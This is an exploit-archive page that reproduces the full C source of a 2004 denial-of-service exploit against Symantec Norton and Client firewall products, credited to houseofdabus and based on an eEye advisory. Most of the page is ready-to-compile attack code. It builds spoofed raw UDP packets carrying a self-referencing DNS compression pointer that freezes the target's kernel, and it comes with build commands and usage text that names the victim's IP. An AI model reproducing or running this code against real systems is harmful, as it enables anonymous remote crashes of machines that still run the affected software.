exploits , vulnerabilities , articles , Symantec Multiple Firewall DNS Response Denial of Service Exploit

2004-05-14
Symantec Multiple Firewall DNS Response Denial of Service Exploit
/* HOD-symantec-firewall-DoS-expl.c:
 *
 * Symantec Multiple Firewall DNS Response Denial-of-Service
 *
 * Exploit version 0.1 coded by
 *
 *
 * .::[ houseofdabus ]::.
 *
 *
 *
 * Bug discoveried by eEye:
 * http://www.eeye.com/html/Research/Advisories/AD20040512B.html 
 *
 * -------------------------------------------------------------------
 * Tested on:
 * - Symantec Norton Personal Firewall 2004
 *
 *
 * Systems Affected:
 * - Symantec Norton Internet Security 2002
 * - Symantec Norton Internet Security 2003
 * - Symantec Norton Internet Security 2004
 * - Symantec Norton Internet Security Professional 2002
 * - Symantec Norton Internet Security Professional 2003
 * - Symantec Norton Internet Security Professional 2004
 * - Symantec Norton Personal Firewall 2002
 * - Symantec Norton Personal Firewall 2003
 * - Symantec Norton Personal Firewall 2004 
 * - Symantec Client Firewall 5.01, 5.1.1 
 * - Symantec Client Security 1.0, 1.1, 2.0(SCF 7.1)
 * - Symantec Norton AntiSpam 2004
 *
 * -------------------------------------------------------------------
 * Description:
 * eEye Digital Security has discovered a second vulnerability
 * in the Symantec firewall product line that can be remotely
 * exploited to cause a severe denial-of-service condition on
 * systems running a default installation of an affected version
 * of the product. By sending a single malicious DNS (UDP port 53)
 * response packet to a vulnerable host, an attacker can cause
 * the Symantec DNS response validation code to enter an infinite
 * loop within the kernel, amounting to a system freeze that requires
 * the machine to be physically rebooted in order to restore operation.
 *
 * -------------------------------------------------------------------
 * Compile:
 * Win32/VC++ : cl -o HOD-sym-DoS-expl HOD-sym-DoS-expl.c ws2_32.lib
 * Win32/cygwin: gcc -o HOD-sym-DoS-expl HOD-sym-DoS-expl.c -lws2_32.lib 
 * Linux : gcc -o HOD-sym-DoS-expl HOD-sym-DoS-expl.c -Wall
 *
 * -------------------------------------------------------------------
 * Command Line Parameters/Arguments:
 *
 * HOD-symantec-firewall-DoS-expl [-fi:str] [-tp:int] [-ti:str] [-n:int] 
 *
 * -fi:IP From (sender) IP address
 * -tp:int To (recipient) port number
 * -ti:IP To (recipient) IP address
 * -n:int Number of times to send message
 *
 */


#ifdef _WIN32
#pragma comment(lib,"ws2_32")
#pragma pack(1)
#define WIN32_LEAN_AND_MEAN 
#include <winsock2.h>
#include <ws2tcpip.h> /* IP_HDRINCL */
#include <stdio.h>
#include <stdlib.h>

#else
#include <sys/types.h>
#include <netinet/in.h>
#include <sys/socket.h>
#include <stdio.h>
#include <stdlib.h>
#include <arpa/inet.h>
#include <netdb.h>
#include <sys/timeb.h>
#include <string.h>
#endif

#define MAX_MESSAGE 4068
#define MAX_PACKET 4096

#define DEFAULT_PORT 53
#define DEFAULT_IP "10.0.0.1"
#define DEFAULT_COUNT 1

#ifndef _WIN32
# define FAR
#endif


/* Define the DNS header */
char dnsreply[] =
"\xc9\x9c" /* Transaction ID */
"\x80\x00" /* Flags (bit 15: response) */
"\x00\x01" /* Number of questions */
"\x00\x01" /* Number of answer RRs */
"\x00\x00" /* Number of authority RRs */
"\x00\x00" /* Number of additional RRs */
"\xC0\x0C"; /* Compressed name pointer to itself */


/* Define the IP header */
typedef struct ip_hdr {
 unsigned char ip_verlen; /* IP version & length */
 unsigned char ip_tos; /* IP type of service */
 unsigned short ip_totallength; /* Total length */
 unsigned short ip_id; /* Unique identifier */
 unsigned short ip_offset; /* Fragment offset field */
 unsigned char ip_ttl; /* Time to live */
 unsigned char ip_protocol; /* Protocol */
 unsigned short ip_checksum; /* IP checksum */
 unsigned int ip_srcaddr; /* Source address */
 unsigned int ip_destaddr; /* Destination address */
} IP_HDR, *PIP_HDR, FAR* LPIP_HDR;

/* Define the UDP header */
typedef struct udp_hdr {
 unsigned short src_portno; /* Source port number */
 unsigned short dst_portno; /* Destination port number */
 unsigned short udp_length; /* UDP packet length */
 unsigned short udp_checksum; /* UDP checksum (optional) */
} UDP_HDR, *PUDP_HDR;


/* globals */
unsigned long dwToIP, // IP to send to
 dwFromIP; // IP to send from (spoof)
unsigned short iToPort, // Port to send to
 iFromPort; // Port to send from (spoof)
unsigned long dwCount; // Number of times to send
char strMessage[MAX_MESSAGE]; // Message to send



void
usage(char *progname) {
	printf("Usage:\n\n");
 printf("%s <-fi:SRC-IP> <-ti:VICTIM-IP> [-tp:DST-PORT]
[-n:int]\n\n", progname);
 printf(" -fi:IP From (sender) IP address\n");
 printf(" -tp:int To (recipient) open UDP port number:\n");
	printf(" 137, 138, 445, 500(default)\n");
 printf(" -ti:IP To (recipient) IP address\n");
 printf(" -n:int Number of times\n");
 exit(1);
}

void
ValidateArgs(int argc, char **argv)
{
 int i;

 iToPort = 500;
 iFromPort = DEFAULT_PORT;
 dwToIP = inet_addr(DEFAULT_IP);
 dwFromIP = inet_addr(DEFAULT_IP); 
 dwCount = DEFAULT_COUNT;
	memcpy(strMessage, dnsreply, sizeof(dnsreply)-1);

 for(i = 1; i < argc; i++) {
 if ((argv[i][0] == '-') || (argv[i][0] == '/')) {
 switch (tolower(argv[i][1])) {
 case 'f':
 switch (tolower(argv[i][2])) {
 case 'i':
 if (strlen(argv[i]) > 4)
 dwFromIP = inet_addr(&argv[i][4]);
 break;
 default:
 usage(argv[0]);
 break;
 } 
 break;
 case 't':
 switch (tolower(argv[i][2])) {
 case 'p':
 if (strlen(argv[i]) > 4)
 iToPort = atoi(&argv[i][4]);
 break;
 case 'i':
 if (strlen(argv[i]) > 4)
 dwToIP = inet_addr(&argv[i][4]);
 break;
 default:
 usage(argv[0]);
 break;
 } 
 break;
 case 'n':
 if (strlen(argv[i]) > 3)
 dwCount = atol(&argv[i][3]);
 break;
 default:
 usage(argv[0]);
 break;
 }
 }
 }
 return;
}


/* This function calculates the 16-bit one's complement sum */
/* for the supplied buffer */
unsigned short
checksum(unsigned short *buffer, int size)
{
 unsigned long cksum=0;

 while (size > 1) {
 cksum += *buffer++;
 size -= sizeof(unsigned short); 
 }
 if (size) {
 cksum += *(unsigned char *)buffer; 
 }
 cksum = (cksum >> 16) + (cksum & 0xffff);
 cksum += (cksum >>16); 

 return (unsigned short)(~cksum); 
}




int
main(int argc, char **argv)
{
#ifdef _WIN32
 WSADATA wsd;
#endif
 int s;
#ifdef _WIN32
	BOOL bOpt;
#else
	int bOpt;
#endif
 struct sockaddr_in remote;
 IP_HDR ipHdr;
 UDP_HDR udpHdr;
 int ret;
 unsigned long i;
 unsigned short iTotalSize,
 iUdpSize,
 iUdpChecksumSize,
 iIPVersion,
 iIPSize,
 cksum = 0;
 char buf[MAX_PACKET],
 *ptr = NULL;
#ifdef _WIN32
 IN_ADDR addr;
#else
	struct sockaddr_in addr;
#endif

	printf("\nSymantec Multiple Firewall DNS Response Denial-of-Service
exploit v0.1\n");
 printf("Bug discoveried by eEye:\n");

printf("http://www.eeye.com/html/Research/Advisories/AD20040512B.html\n\n");
	printf("--- Coded by .::[ houseofdabus ]::. ---\n\n");

	if (argc < 3) usage(argv[0]);

 /* Parse command line arguments and print them out */
 ValidateArgs(argc, argv);
#ifdef _WIN32
 addr.S_un.S_addr = dwFromIP;
 printf("[*] From IP: <%s>, port: %d\n", inet_ntoa(addr),
iFromPort);
 addr.S_un.S_addr = dwToIP;
 printf("[*] To IP: <%s>, port: %d\n", inet_ntoa(addr),
iToPort);
 printf("[*] Count: %d\n", dwCount);
#else
 addr.sin_addr.s_addr = dwFromIP;
 printf("[*] From IP: <%s>, port: %d\n",
inet_ntoa(addr.sin_addr), iFromPort);
 addr.sin_addr.s_addr = dwToIP;
 printf("[*] To IP: <%s>, port: %d\n",
inet_ntoa(addr.sin_addr), iToPort);
 printf("[*] Count: %d\n", dwCount);
#endif

#ifdef _WIN32
 if (WSAStartup(MAKEWORD(2,2), &wsd) != 0) {
 printf("[-] WSAStartup() failed: %d\n", GetLastError());
 return -1;
 }
#endif
 /* Creating a raw socket */
 s = socket(AF_INET, SOCK_RAW, IPPROTO_UDP);
#ifdef _WIN32
 if (s == INVALID_SOCKET) {
 printf("[-] WSASocket() failed: %d\n", WSAGetLastError());
 return -1;
 }
#endif

 /* Enable the IP header include option */
#ifdef _WIN32
 bOpt = TRUE;
#else
 bOpt = 1;
#endif
 ret = setsockopt(s, IPPROTO_IP, IP_HDRINCL, (char *)&bOpt,
sizeof(bOpt));
#ifdef _WIN32
 if (ret == SOCKET_ERROR) {
 printf("[-] setsockopt(IP_HDRINCL) failed: %d\n",
WSAGetLastError());
 return -1;
 }
#endif
 /* Initalize the IP header */
 iTotalSize = sizeof(ipHdr) + sizeof(udpHdr) + sizeof(dnsreply)-1;

 iIPVersion = 4;
 iIPSize = sizeof(ipHdr) / sizeof(unsigned long);

 ipHdr.ip_verlen = (iIPVersion << 4) | iIPSize;
 ipHdr.ip_tos = 0; /* IP type of service */
 ipHdr.ip_totallength = htons(iTotalSize); /* Total packet len */
 ipHdr.ip_id = 0; /* Unique identifier: set to 0 */
 ipHdr.ip_offset = 0; /* Fragment offset field */
 ipHdr.ip_ttl = 128; /* Time to live */
 ipHdr.ip_protocol = 0x11; /* Protocol(UDP) */
 ipHdr.ip_checksum = 0 ; /* IP checksum */
 ipHdr.ip_srcaddr = dwFromIP; /* Source address */
 ipHdr.ip_destaddr = dwToIP; /* Destination address */

 /* Initalize the UDP header */
 iUdpSize = sizeof(udpHdr) + sizeof(dnsreply)-1;

 udpHdr.src_portno = htons(iFromPort) ;
 udpHdr.dst_portno = htons(iToPort) ;
 udpHdr.udp_length = htons(iUdpSize) ;
 udpHdr.udp_checksum = 0 ;


	iUdpChecksumSize = 0;
 ptr = buf;
	memset(buf, 0, MAX_PACKET);

 memcpy(ptr, &ipHdr.ip_srcaddr, sizeof(ipHdr.ip_srcaddr)); 
 ptr += sizeof(ipHdr.ip_srcaddr);
 iUdpChecksumSize += sizeof(ipHdr.ip_srcaddr);

 memcpy(ptr, &ipHdr.ip_destaddr, sizeof(ipHdr.ip_destaddr)); 
 ptr += sizeof(ipHdr.ip_destaddr);
 iUdpChecksumSize += sizeof(ipHdr.ip_destaddr);

 ptr++;
 iUdpChecksumSize += 1;

 memcpy(ptr, &ipHdr.ip_protocol, sizeof(ipHdr.ip_protocol)); 
 ptr += sizeof(ipHdr.ip_protocol);
 iUdpChecksumSize += sizeof(ipHdr.ip_protocol);

 memcpy(ptr, &udpHdr.udp_length, sizeof(udpHdr.udp_length)); 
 ptr += sizeof(udpHdr.udp_length);
 iUdpChecksumSize += sizeof(udpHdr.udp_length);
 
 memcpy(ptr, &udpHdr, sizeof(udpHdr)); 
 ptr += sizeof(udpHdr);
 iUdpChecksumSize += sizeof(udpHdr);

	for(i = 0; i < sizeof(dnsreply)-1; i++, ptr++)
 *ptr = strMessage[i];
 iUdpChecksumSize += sizeof(dnsreply)-1;

 cksum = checksum((unsigned short *)buf, iUdpChecksumSize);
 udpHdr.udp_checksum = cksum;


	memset(buf, 0, MAX_PACKET);
 ptr = buf;

 memcpy(ptr, &ipHdr, sizeof(ipHdr)); ptr += sizeof(ipHdr);
 memcpy(ptr, &udpHdr, sizeof(udpHdr)); ptr += sizeof(udpHdr);
 memcpy(ptr, strMessage, sizeof(dnsreply)-1);

 remote.sin_family = AF_INET;
 remote.sin_port = htons(iToPort);
 remote.sin_addr.s_addr = dwToIP;
 
 for(i = 0; i < dwCount; i++) {
#ifdef _WIN32
 ret = sendto(s, buf, iTotalSize, 0, (SOCKADDR *)&remote, 
 sizeof(remote));

 if (ret == SOCKET_ERROR) {
 printf("[-] sendto() failed: %d\n", WSAGetLastError());
 break;
 } else
#else
 ret = sendto(s, buf, iTotalSize, 0, (struct sockaddr *) &remote, 
 sizeof(remote));
#endif
 printf("[+] sent %d bytes\n", ret);
 }

#ifdef _WIN32
 closesocket(s);
 WSACleanup();
#endif

 return 0;
}
securitydot.net - 2004-05-14
Exploits - newest 10 RSS | More
2007-06-15 38444 Hits XOOPS Module Cjay Content 3 Remote File Inclusion Vulnerability
2007-06-15 20065 Hits XOOPS Module XT-Conteudo (spaw_root) RFI Vulnerability
2007-06-15 23885 Hits XOOPS Module XFsection (modify.php) Remote File Inclusion Vulnerability
2007-06-15 20046 Hits Microsoft Office MSODataSourceControl COM-object BoF PoC (0day)
2007-06-13 12345 Hits Microsoft Speech API ActiveX control Remote BoF Exploit (xp sp2)
2007-06-13 10503 Hits Microsoft Speech API ActiveX control Remote BoF Exploit (win2k sp4)
2007-06-13 12716 Hits Safari 3 for Windows Beta Remote Command Execution PoC
2007-06-13 10568 Hits Ace-FTP Client 1.24a Remote Buffer Overflow PoC
2007-06-09 22722 Hits MoviePlay 4.76 .lst File Local Buffer Overflow Exploit
2007-06-09 11063 Hits e-Vision CMS <= 2.02 SQL Injection/Remote Code Execution Exploit